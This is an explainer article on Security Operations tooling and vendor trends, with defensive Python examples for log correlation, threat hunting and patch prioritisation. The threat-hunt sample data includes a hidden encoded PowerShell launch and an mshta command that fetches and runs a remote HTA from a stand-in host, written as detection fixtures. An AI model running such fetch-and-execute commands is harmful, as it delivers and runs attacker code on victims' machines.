What is Security Operations (SecOps)? Defined, Explained, and Trends
Chief Technology Evangelist
February 8, 2022
What is Security Operations (SecOps)?
Security operations are the beating heart of an organization’s security activity. Security Operations can be performed in-house by a team of skilled security professionals, by a third-party Security Operations Center (SOC), or by a combination of the two. Security Operations works as a centralized coordination unit, built on people, processes, and technology, to manage cybersecurity threats and incidents. It depends on telemetry gathered from across the corporate IT infrastructure: event logs from disparate devices and data stores, collated by specialist tools that detect, interpret, and help resolve security events. We've teamed up with Arrow to break down what security operations is, the processes involved, and the trends.
What are some of the responsibilities of Security Operations teams?
Some common responsibilities of the Security Operations team include:
Monitoring and responding to security incidents
Implementing and maintaining security controls and technologies
Conducting security assessments and vulnerability scans, and driving remediation of the findings
Developing and implementing security policies and procedures
Ensuring compliance with security regulations and standards
Providing or overseeing security awareness training to the broader organization
Conducting forensic investigations to determine the root cause of security incidents
Staying up-to-date with the latest security threats and vulnerabilities
Responding to security-related inquiries and requests from other teams and departments
Why is Security Operations Important?
Understanding the complex and emerging threats that make up the cybersecurity landscape requires intelligence. MITRE, a not-for-profit that operates US federally funded research and development centers, maintains ATT&CK, a publicly available knowledge base of adversary tactics and techniques that supports both government and non-government Security Operations. One look at the MITRE ATT&CK matrix shows how intricate, interconnected, and complex modern threats are. In 2021, Accenture recorded a 125% increase in global cyber intrusion activity; the volume and complexity of security threats require deep intelligence to defend an organization.
Threat intelligence helps organizations identify, manage, and respond to cyber threats by analyzing high volumes of "threat indicators" (indicators of compromise such as malicious IP addresses, domains, and file hashes). The intelligence gathered under a Security Operations model is used to detect emerging or ongoing cyber threats. This analysis runs continuously, and its output is used to harden the enterprise against the attack or close off the vulnerabilities it exploits.
What are the technologies that support Security Operations?
The Security Operations team needs specialist technologies to support its intelligence gathering and analysis. Each of the following is one of the building blocks used to create a strong, intelligence-driven security posture:
Security Information & Event Management (SIEM)
A SIEM is an event log management and analysis system used by Security Operations to collect, normalize, correlate, and analyze event logs in near real time, with the SIEM acting as the central data orchestration point. These event logs are generated across an enterprise’s expanded IT infrastructure and capture access and login events, data from anti-malware and endpoint security tools, signs of potential malware activity such as unusual data exfiltration, and so on. The SIEM collates and analyzes the logs and creates reports, with deviations from a baseline (or matches on correlation rules) generating alerts. Modern SIEM systems also offer user and entity behavior analytics (UEBA) based on machine learning.
Threat Intelligence Platforms (TIP)
Threat intelligence turns raw information into knowledge that helps an organization identify, manage, and respond to security threats. There are potentially millions of these pieces of data, or ‘threat indicators’, to analyze. Because of the volume, organizations use a Threat Intelligence Platform (TIP) designed specifically to collate and analyze these data and build a picture of the organization’s threat profile. A TIP streamlines locating, collecting, aggregating, de-duplicating, and analyzing indicators, reducing the noise of millions of data points and the number of false positives. The output from a TIP is fed into the SIEM to improve the accuracy of its reports and alerts, and it lets the Security Operations team make proactive, informed decisions. A TIP is typically deployed as a cloud service (SaaS) but can also be hosted on-premises.
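The SIEM and TIP paragraphs above describe a pipeline: raw logs are normalized, a correlation rule fires on a deviation from the baseline, and the alert is enriched with indicators from a threat-intel feed. The following is an added example of that pipeline in miniature; it is not code from the article, from Arrow, or from any SIEM or TIP vendor. The sshd log lines, the feed entries, the confidence values, and the `fail_threshold`/`min_confidence` parameters are all constructed for illustration (the addresses are RFC 5737 documentation ranges).

```python
"""Toy SIEM correlation with threat-intel enrichment (added example, constructed data)."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sshd lines in syslog format; not real data.
SAMPLE_LOGS = """\
Jan 10 09:00:01 bastion sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Jan 10 09:00:02 bastion sshd[1202]: Failed password for invalid user test from 203.0.113.7 port 51235 ssh2
Jan 10 09:00:03 bastion sshd[1203]: Failed password for root from 203.0.113.7 port 51236 ssh2
Jan 10 09:00:04 bastion sshd[1204]: Failed password for root from 203.0.113.7 port 51237 ssh2
Jan 10 09:00:05 bastion sshd[1205]: Accepted password for root from 203.0.113.7 port 51238 ssh2
Jan 10 09:01:10 bastion sshd[1210]: Failed password for alice from 198.51.100.5 port 40001 ssh2
Jan 10 09:01:20 bastion sshd[1211]: Accepted publickey for alice from 198.51.100.5 port 40002 ssh2
Jan 10 09:02:00 bastion sshd[1212]: Accepted publickey for bob from 192.0.2.44 port 40003 ssh2
"""

# Constructed TIP export after de-duplication: indicator -> (feed name, confidence 0-100).
SAMPLE_TI_FEED: Dict[str, Tuple[str, int]] = {
    "203.0.113.7": ("constructed-feed-a", 90),
    "192.0.2.44": ("constructed-feed-b", 20),
}

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<outcome>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})"
)


@dataclass
class AuthEvent:
    outcome: str
    method: str
    user: str
    src: str


@dataclass
class Alert:
    src: str
    reason: str
    users: List[str] = field(default_factory=list)
    ti_feed: Optional[str] = None
    ti_confidence: int = 0


def parse_auth_log(text: str) -> List[AuthEvent]:
    """Normalize raw sshd lines into structured events; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(AuthEvent(**m.groupdict()))
    return events


def correlate(events: List[AuthEvent], ti_feed: Dict[str, Tuple[str, int]],
              fail_threshold: int = 3, min_confidence: int = 50) -> List[Alert]:
    """Correlation rule: a successful login from a source that already failed
    `fail_threshold` or more times raises an alert. Every source is then checked
    against the TIP export: existing alerts are enriched with the feed and confidence,
    and a source that only matches intel is alerted on its own when the feed
    confidence is at least `min_confidence` (so a low-confidence hit stays quiet)."""
    failures: Counter = Counter()
    alerts: Dict[str, Alert] = {}
    for e in events:
        if e.outcome == "Failed":
            failures[e.src] += 1
        elif failures[e.src] >= fail_threshold:
            alert = alerts.setdefault(
                e.src, Alert(e.src, f"successful login after {failures[e.src]} failures"))
            alert.users.append(e.user)
    for src in {e.src for e in events}:
        if src not in ti_feed:
            continue
        feed, confidence = ti_feed[src]
        if src in alerts:
            alerts[src].ti_feed, alerts[src].ti_confidence = feed, confidence
        elif confidence >= min_confidence:
            alerts[src] = Alert(src, "source matches threat-intel indicator", [], feed, confidence)
    # Highest-confidence intel first, then by source for a stable order.
    return sorted(alerts.values(), key=lambda a: (-a.ti_confidence, a.src))


def run_demo() -> List[Alert]:
    return correlate(parse_auth_log(SAMPLE_LOGS), SAMPLE_TI_FEED)


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a.src}: {a.reason}; users={a.users}; intel={a.ti_feed} ({a.ti_confidence})")
```

On the sample data only 203.0.113.7 is alerted: four failures followed by a successful root login, enriched with the 90-confidence indicator. The 198.51.100.5 source fails once and then succeeds with a key, which is below the threshold, and 192.0.2.44 appears in the feed at confidence 20, which is exactly the low-confidence noise a TIP is meant to keep out of the alert queue.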
Security Analytics
Security analytics is the practical application of data analysis to cybersecurity intelligence. The analysis is typically done using machine learning (ML) alongside more traditional algorithms, over both historical and real-time data, and looks for anomalies that may signal a security event. The output of a security analytics tool allows an organization to be more proactive in its threat detection and diagnosis, and can surface both insider and external threats. Typical data sources include alerts and feeds from firewalls and endpoint security tools, network traffic data, and third-party security data feeds. Security analytics platforms are typically composed of several elements: behavioral analytics (detects anomalous user behavior and events); network analysis and visibility (NAV, analyzes network traffic); and security orchestration, automation, and response (SOAR; this may be provided through integration with a SIEM).
Incident Response
Incident response describes how a company manages a security incident such as a data breach or any other type of cyber attack. A security incident can lead to massive disruption of business operations. This impacts productivity, affects business continuity, and can damage reputation; it can also place a company into non-compliance with data protection and privacy regulations. Incident response is usually carried out by a specialist team called a computer security incident response team (CSIRT, sometimes CIRT). The team works from an incident response plan that directs activities to mitigate the attack and handle the situation post-attack. Incident response focuses on minimizing the impact of an attack, ensuring that any data leaks are contained, and putting processes in place to prevent the threat from continuing.
Security Orchestration, Automation & Response (SOAR)
A SOAR platform is a suite of security tools that ingests alerts and data from various sources, including the SIEM, and runs playbooks that automate the repetitive tasks security analysts perform. Typically, a SOAR platform is designed to combine machine learning-based analysis with human interpretation; the latter helps define and prioritize any potential threat indicators.
Patch Management
Cyber attacks often exploit vulnerabilities in software and systems. To close these security gaps, vendors release patches and updates that fix security flaws. Patch management is most effective when automated, so that the interval between a fix being published and it being deployed is measured in days rather than months.
Digital Forensics & eDiscovery
Specialized eDiscovery solutions search through the large amounts of Electronically Stored Information (ESI) common in modern organizations. The reasons for using eDiscovery are wide-ranging and include legal purposes, regulatory compliance, and general cybersecurity-related digital forensics. An eDiscovery tool requires relevant data input before the software can index and process these data to identify duplicate and unusable files. eDiscovery tools then search through the files to review, annotate, and tag them.
Digital Forensics differs from eDiscovery in that its focus is on recovering evidence, including hidden, obfuscated, or deleted data, in a forensically sound way that preserves the chain of custody. Digital Forensics is an often-lengthy task performed by highly-skilled analysts who examine devices, disk and memory images, and network shares to locate data of interest. It often requires manual techniques to extract these data.
Threat Hunting
Threat hunting is the proactive, hypothesis-driven search for adversaries that have evaded existing automated defenses within an IT infrastructure, including the people who use it. Threat hunters are part of Security Operations and are highly skilled. They use experience, cyber know-how, and specialist tools to locate unusual behavior and anomalies across the expanded corporate network. Known Indicators of Compromise (IoC) and Indicators of Attack (IoA) are used as a starting point for a hunt, and crowd-sourced attack data and frameworks such as MITRE ATT&CK help shape hunt hypotheses around specific adversary techniques. Machine learning-enabled tools help threat hunters sift through the copious amounts of data generated across the expanded network.
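A concrete hunt of the kind the paragraph above describes starts from an ATT&CK-framed hypothesis rather than from an alert: "a document opened from a phishing email spawned a shell or script host". The block below is an added example of that hunt over endpoint process-creation events; it is not code from the article or from any vendor. The events are constructed in a Sysmon/EDR-like shape, the hosts and paths are made up, and the "encoded" PowerShell payload is a harmless string built at import time so that the decoder can be exercised without shipping a real sample. The technique IDs are MITRE ATT&CK's own.

```python
"""Hypothesis-driven hunt over process events (added example, constructed data)."""
import base64
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Child image -> ATT&CK technique for that execution method.
SHELL_TECHNIQUES = {
    "powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",   # Command and Scripting Interpreter: PowerShell
    "cmd.exe": "T1059.003",                                    # Windows Command Shell
    "wscript.exe": "T1059.005", "cscript.exe": "T1059.005",   # Visual Basic
    "mshta.exe": "T1218.005",                                  # System Binary Proxy Execution: Mshta
}

# Constructed, harmless payload so the -EncodedCommand case can be exercised.
PLAIN_COMMAND = "Write-Host 'constructed test payload'"
ENCODED_COMMAND = base64.b64encode(PLAIN_COMMAND.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (hosts, paths and command lines are made up).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_COMMAND}"},
    {"host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"host": "ws03",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://invoice.example/open.hta"},
    {"host": "ws04",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]


def image_name(path: str) -> str:
    """Last path component, lower-cased, so 'WINWORD.EXE' matches 'winword.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    and the argument is base64 of a UTF-16LE string. Returns the decoded script,
    or None when there is no such flag or the payload does not decode."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt_office_child_processes(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Hypothesis: an Office application spawned a shell or script host.
    Each hit carries the ATT&CK techniques it supports and, where present,
    the decoded PowerShell command so the hunter can read what actually ran."""
    hits = []
    for ev in events:
        parent, child = image_name(ev["parent"]), image_name(ev["image"])
        if parent not in OFFICE_PARENTS or child not in SHELL_TECHNIQUES:
            continue
        techniques = ["T1566.001", "T1204.002", SHELL_TECHNIQUES[child]]
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            techniques.append("T1027")  # Obfuscated Files or Information
        hits.append({"host": ev["host"], "parent": parent, "child": child,
                     "techniques": techniques, "decoded_command": decoded})
    return hits


if __name__ == "__main__":
    for hit in hunt_office_child_processes(SAMPLE_EVENTS):
        print(hit)
```

Two of the four constructed events are hits: the Word-to-PowerShell chain on ws01 (with the encoded command decoded for the analyst) and the Outlook-to-mshta chain on ws03. The explorer-to-cmd and services-to-svchost chains are ordinary and are left alone, which is the point of pinning the hunt to a specific parent/child hypothesis instead of flagging every shell launch.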
Security Operations Technology Trends and Disruptions
The discipline of Security Operations incorporates fast-emerging technologies to help fight against cyber threats. Some of the most critical areas on the rise in this space are:
Security Automation
Automation is a key emerging technology in cybersecurity and Security Operations. Automation reduces the need for a human operator to evaluate the massive amounts of data involved in analyzing potential security events. It helps security teams focus on important security issues by providing the analysis, detection, and triage needed to give the team the bandwidth to respond appropriately and remediate issues. Within the discipline of security automation are several sub-categories of solutions and approaches:
Security Orchestration, Automation & Response (SOAR)
SOAR is taking the security automation world by storm. This powerful solution uses intelligent technologies and processes such as machine learning to ease the management of security alerts. SOAR platforms are usually integrated into the SecOps (IT Security + IT Operations) process to reduce the mean time to resolution (MTTR) of a security incident. Swimlane is making waves in the space by providing what it describes as the first cloud-scale low-code SOAR capability that integrates deeply into a SecOps process. Swimlane supports SecOpsHub, which provides community support for incident response. Another contender disrupting SOAR is D3Security, which offers a comprehensive package that includes a MITRE ATT&CK kill chain discovery feature. D3Security also provides a package for MSPs to deliver SOAR-as-a-Service.
Patch Management Automation
According to software vulnerability tracker CVE Details, 2021 saw the highest number of recorded software flaws in its history. As unpatched vulnerabilities are like honey to bees for cybercriminals, patching the numerous security flaws is vital to maintaining a secure environment. Fortunately, patch management has gone from onerous to achievable using automation. In this space, Automox is fully cloud-native, reducing the operational overhead of patch management across multiple geographies. JetPatch is another disrupter in patch automation, providing patch automation across cloud, hybrid, or on-premises environments.
Compliance Automation
Keeping in compliance with regulations is complicated; regulations are often updated and can have a far-reaching impact on IT operations. Compliance automation helps an organization maintain security by monitoring and automating the manual tasks needed to maintain compliance. Disruptors in this space include Vanta and Drata. Vanta provides a platform to automate security monitoring that maps to a variety of frameworks, including HIPAA and SOC 2. Similarly, Drata provides a fully-fledged automation platform that delivers compliance monitoring for frameworks including HIPAA and PCI DSS.
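Given the volume of flaws the paragraph above describes, the part of patch automation that decides what gets patched first is where the leverage is: join the advisory feed against the software inventory, keep only the hosts actually below the fixed version, and rank by severity, observed exploitation, and exposure. The block below is an added example of that join and ranking; it is not code from the article or from Automox, JetPatch, or any other vendor. The advisory IDs, package names, versions, hosts, scores, and the +5/+3 weighting are all constructed placeholders (the IDs are deliberately not CVE-shaped).

```python
"""Patch prioritisation: advisories joined against inventory (added example, constructed data)."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Advisory:
    advisory_id: str      # constructed placeholder, not a real identifier
    package: str
    fixed_version: str    # first version that carries the fix
    cvss: float
    exploited: bool       # vendor- or KEV-style "exploitation observed" flag


@dataclass(frozen=True)
class Installed:
    host: str
    package: str
    version: str
    internet_facing: bool


@dataclass(frozen=True)
class PatchTask:
    priority: float
    host: str
    package: str
    installed: str
    advisory_id: str
    target: str


# Constructed advisory feed and inventory; every value here is made up.
ADVISORIES = [
    Advisory("ADV-0001", "webproxy", "2.4.1", 9.8, True),
    Advisory("ADV-0002", "webproxy", "2.3.0", 5.3, False),
    Advisory("ADV-0003", "dbclient", "10.2.0", 7.5, False),
    Advisory("ADV-0004", "imagelib", "1.0.12", 8.1, True),
]
INVENTORY = [
    Installed("edge-01", "webproxy", "2.4.0", True),
    Installed("app-07", "webproxy", "2.4.1", False),
    Installed("app-07", "dbclient", "10.1.9", False),
    Installed("build-03", "imagelib", "1.0.9", False),
    Installed("edge-02", "imagelib", "1.0.12", True),
]


def parse_version(v: str) -> Tuple[int, ...]:
    """'1.0.12' -> (1, 0, 12). Plain string comparison would rank 1.0.9 above 1.0.12."""
    return tuple(int(part) for part in v.split("."))


def is_vulnerable(inst: Installed, adv: Advisory) -> bool:
    """Same package and installed version strictly below the fixed version."""
    return inst.package == adv.package and parse_version(inst.version) < parse_version(adv.fixed_version)


def priority(inst: Installed, adv: Advisory) -> float:
    """CVSS base score, boosted when exploitation has been observed and when
    the host is internet-facing; the weights are an assumption for illustration."""
    score = adv.cvss
    if adv.exploited:
        score += 5.0
    if inst.internet_facing:
        score += 3.0
    return score


def build_patch_queue(inventory: List[Installed], advisories: List[Advisory]) -> List[PatchTask]:
    """Join advisories against the inventory and return tasks, highest priority first."""
    queue = [
        PatchTask(priority(inst, adv), inst.host, inst.package, inst.version,
                  adv.advisory_id, adv.fixed_version)
        for inst in inventory
        for adv in advisories
        if is_vulnerable(inst, adv)
    ]
    queue.sort(key=lambda t: (-t.priority, t.host, t.advisory_id))
    return queue


if __name__ == "__main__":
    for task in build_patch_queue(INVENTORY, ADVISORIES):
        print(f"{task.priority:5.1f}  {task.host:9} {task.package} {task.installed} -> {task.target} ({task.advisory_id})")
```

On the constructed data the queue comes out as edge-01 (internet-facing, exploited, CVSS 9.8), then build-03 (exploited library, internal), then app-07's database client; hosts already at the fixed version drop out of the join entirely. The numeric version parse matters: "1.0.9" compares greater than "1.0.12" as a string, which would silently mark build-03 as patched.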
Breach & Attack Simulation
This emerging area is a type of automated penetration testing; Breach and Attack Simulation tools provide the means to detect weaknesses in an organization’s cyber-defenses automatically and continuously. Interesting vendors in this space include AttackIQ, which uses the MITRE ATT&CK matrix, alongside internal expertise, to run attack scenarios against a company’s critical assets. Another vendor of interest is Cymulate, which provides a lightweight agent to run attack scenarios based on the MITRE ATT&CK matrix.
Attack Surface Management
This process ensures that the entire estate of an IT infrastructure is under continuous discovery and monitoring, enabling asset classification to prioritize security controls. Types of attack surface management currently disrupting the discipline include:
Cyber Asset Attack Surface Management (CAASM)
Visibility is always an issue in dispersed IT infrastructures that may also contain legacy elements. CAASM tools use APIs to link existing data sources to locate resources and validate security controls. The space is disrupted by several vendors, including Axonius and JupiterOne. Axonius offers comprehensive integrations with over 400 applications and provides complete visibility of assets and automated policy validation. JupiterOne has over 150 integrations to provide visibility of cyber-assets. The company releases new integrations every two weeks.
External Attack Surface Management
External or digital attack surface management covers all the internet-facing assets that could be exploited during a cyber attack. Managing the external surface is complicated by shadow IT and asset exposure across the massive surface of the internet. In this space, CyCognito provides what it calls a “Shadow Risk Elimination platform”, which uses nation-state-level reconnaissance techniques to locate hidden assets. Expanse is another disruptor in the space, offering deep visibility into internet-facing assets; the company was acquired by Palo Alto Networks and its product is now sold as Cortex Xpanse.
Digital Risk Protection Services (DRPS)
DRPS reduces the risk of unwanted or malicious exposure of sensitive data, company brand, and other assets. Achieving this across an expansive attack surface is no small feat. However, disruptive vendors ZeroFox and CybelAngel are doing just that. ZeroFox uses artificial intelligence (AI) to disrupt the kill chain, including taking down malicious domains. CybelAngel provides comprehensive monitoring of assets across every layer of the web using machine learning algorithms.
Security Ratings
Metrics offer actionable insights for many scenarios: security ratings are a quantitative measure, built from metrics, that provides a view of an organization's security posture. They are a useful guide to whether your company is doing well or not in terms of cybersecurity risk mitigation. BitSight and UpGuard offer leading-edge solutions in security rating services. BitSight is a pioneer of security ratings, applying an ‘outside-in’ model like that used by credit reference agencies. UpGuard uses a set of proprietary algorithms to analyze millions of data points from commercial and open-source resources to evaluate cybersecurity risk quantitatively.
What are the CXO Priorities within Security Operations?
The cybersecurity threat landscape lies within the eye of a perfect storm: cybercriminals are emboldened by massive financial gains from the success of ransomware, with 37% of organizations suffering a ransomware attack in 2021. The massive attack surface makes threat hunting complicated; vulnerabilities are proliferating, and Security Operations tools typically require skilled staff to optimize their use. This storm sets the priorities of the CXO as:
Skills Gap
The (ISC)2 2021 Cybersecurity Workforce Study estimates that the global cybersecurity workforce needs to grow by 65% to defend organizations' critical assets effectively.
Skills shortages in security must be a focus for the CXO, who should look to improve recruitment by reaching out to a more diverse talent pool. Also, look to train internal employees who show an interest in security.
Tool Sprawl
Dealing with the complications caused by security tool sprawl must be on the CXO watch list. A Trend Micro survey found that companies run around 29 security monitoring solutions. This sprawl increases noise and leaves security staff unhappy and overrun with false-positive alerts.
A CXO should look to manage this by consolidating on integrated tools for Security Operations or by outsourcing to a SOC.
Asset Visibility
A 2021 survey from the Enterprise Strategy Group (ESG) and Axonius found that 79% of organizations reported a widening visibility gap across their cloud infrastructures. This was due to pandemic-related remote working, end-user device proliferation, and the Internet of Things (IoT), the result being increased cybersecurity risk. CXOs should place a strong focus on asset visibility, with enforceable security policies based on a mapped asset inventory.
Detection & Response Time
According to IBM's 2020 Cost of a Data Breach Report, it takes an average of 207 days to identify a breach and a further 73 days to contain it. In that time, sensitive data can be exfiltrated, email accounts can be compromised, and malware can be installed.
A CXO must ensure that the security team builds strategies to reduce breach detection times by developing a proactive security posture. Technologies such as SOAR, SIEM, and automated patch management can help in this endeavor.
Cloud Security Operations
Without cloud computing, dealing with disruptions like the pandemic would have been much more challenging. However, cloud computing also brings challenges, as it expands the potential attack surface. Not only must security teams secure the traditional infrastructure, but Security Operations must extend into cloud infrastructure and Software-as-a-Service (SaaS) environments.
CXOs can turn to next-generation tools to ensure that Security Operations can meet the security challenges of this expanded infrastructure. These tools use emerging technologies such as automation and AI/ML to deal with the massive amount of data generated across this surface.
Want to stay on top of security operations technologies? We Can Help
At Vation Ventures, we focus on innovations and trends in technologies on your behalf. We help offset the cost, effort, and time you spend identifying and comparing technologies to solve your organization's problems. Want to learn more? Get in touch today.